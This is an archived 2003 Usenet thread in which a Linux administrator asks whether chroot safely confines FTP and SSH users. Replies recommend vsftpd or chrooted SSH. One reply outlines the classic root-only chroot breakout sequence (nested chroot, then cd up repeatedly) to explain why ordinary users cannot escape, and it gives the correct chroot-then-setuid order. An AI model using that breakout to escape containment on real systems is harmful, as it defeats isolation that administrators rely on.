f



How security of chroot?

Hi,
I'm going to config chroot on my linux server (RHL8) in order to limit the
user to their home directory. I got many information from some websites and
some of them reminded that chroot also can be breaked. Thus, is it safe to
setup chroot on my linux server since I would provide secure FTP services
for some users?! And don't want them browse others directories on the
server.

Thanks,

Keith


0
keithtin (1)
6/30/2003 4:32:42 AM
comp.security.ssh 4228 articles. 0 followers. terra1024 (490) is leader. Post Follow

4 Replies
665 Views

Similar Articles

[PageSpeed] 54

Keith, If you're going to use FTP, you should be using vsFTPd
http://vsftpd.beasts.org/ which includes chroot functionality with a
simple...
chroot_local_user=YES
....setting. You can also pick & choose which users will be chrooted,
etc. Check it out.

If you're wanting to do chroot at ssh level (hence posting to THIS
newsgroup?) there's been a bit of discussion about this in a recent
posting earlier in this group...
http://groups.google.com/groups?dq=&hl=en&lr=&ie=UTF-8&threadm=20030628171315.6130a5ab.alex.ferguson%40NOSPAMdartmouth.edu&prev=/groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26group%3Dcomp.security.ssh
0
jonsnews (13)
6/30/2003 10:27:36 AM
Keith wrote:
> "jon" <jonsnews@hotmail.com> ???
> news:cf91fbf4.0306300227.3ecb971b@posting.google.com ???...
> 
>>Keith, If you're going to use FTP, you should be using vsFTPd
>>http://vsftpd.beasts.org/ which includes chroot functionality with a
>>simple...
>>chroot_local_user=YES
>>...setting. You can also pick & choose which users will be chrooted,
>>etc. Check it out.
>>
>>If you're wanting to do chroot at ssh level (hence posting to THIS
>>newsgroup?) there's been a bit of discussion about this in a recent
>>posting earlier in this group...
>>
> 
> http://groups.google.com/groups?dq=&hl=en&lr=&ie=UTF-8&threadm=20030628171315.6130a5ab.alex.ferguson%40NOSPAMdartmouth.edu&prev=/groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26group%3Dcomp.security.ssh
> 
> Which method do you think better (utilize and security), setup chroot over
> ssh or just setup vsftp? Thanks.
> 
> Keith

If you want to make download/upload trivial for everyone, vsftpd (which 
is an FTP daemon). If you don't want passwords sniffed or want to 
provide public key access and possible remote shell access, chrooted ssh.

0
nkadel2 (101)
7/2/2003 3:52:24 AM
Keith - if your users are going to be copying files to/from the SSH
server from their Windows machines then PuTTY and WinSCP (using key
authentication) is a nice way to go. Look into getting your users to
load their private key into the PuTTY Agent - I do this by adding the
agent to their Startup folder & pointing it at their key (e.g. target
path is '"C:\Program Files\PuTTY\pageant.exe" h:\keys\putty.PPK'
....where h: is their home drive).

If you can get chroot working with OpenSSH - even better.

Sounds like you don't need FTP on this occasion. Good luck.
0
jonsnews (13)
7/2/2003 4:02:24 PM
On Wed, 2 Jul 2003 18:03:57 +0800
"Keith" <keithtin@yahoo.com.hk> wrote:

> But you had also mentioned chrooted ssh could be broken, indeed.
[snip]

You've mentioned concerns about chroot a couple times, so I'm guessing you read somewhere that it is possible to break out of the chroot and see the rest of the filesystem.  Barring a horrible kernel bug, this should be true *only* for the root user.  iirc, it is possible as root to break from a chroot by something like this:

mkdir foo
chroot to foo
cd ../../../../../../../../../../..
chroot to .

This works because you chroot yourself to a directory below the current directory.  Since chroot() requires root privileges, a normal user should not be able to break a chroot.  Real chrooted applications need to always chroot(foo); cd(/); setuid(bar) where bar != 0 :)

I wrote up a very short c program which can be used as a user's shell and chroots to their home directory, then execs sh, but I never bothered to actually use it.  It might be of use if you want to chroot openssh users, though there is probably a more polished version out there somewhere.. let me know if you would like me to post it where you can download it.

--Alex
0
7/2/2003 5:53:08 PM
Reply: